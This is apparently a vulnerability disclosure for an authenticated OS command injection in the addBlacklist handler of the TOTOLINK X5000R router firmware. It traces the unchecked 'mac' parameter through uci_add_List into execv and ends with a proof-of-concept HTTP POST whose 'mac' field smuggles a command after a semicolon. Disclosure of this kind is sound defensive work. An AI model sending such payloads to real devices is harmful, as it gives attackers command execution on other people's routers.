totolink X5000r devices through v9.1.0cu.2350_b20230313
In totolink X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains a OS command injection vulnerability in addBlacklist. Authenicated Attackers can send malicious packet to execute arbitary commands.
In function addBlacklist (at 0x4201cc) of binary /cgi-bin/cstecgi.cgi. The parameter mac is passed to uci_add_List without any check.
uci_add_List passes the parameter mac as the fourth argument, which is in libcscommon.so.It can be observed that uci_add_List calls snprintf to format our param_4 into the string "uci -c %s add_list %s.%s.%s="%s\ ..." and passes the string to the CsteSystem function,which will eventually be called by execv.
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.1.1
Content-Length: 189
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.1
Referer: http://192.168.1.1/basic/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"topicurl": "addBlacklist", "mac": ";wzq^e^a\\aaeaa]aca\\caa]dadaacaaea]^de^a``aa^aa_e]a_bvzoaaca`a`]`aaa`c_a_ea]ae\\caacdaaaba_aaaaa^a_\\aawznwyps~qw|lx_caaaaaaa\\aaa_e`cb\\aaea^aaaeadaaaacdaaab_a\\acab"}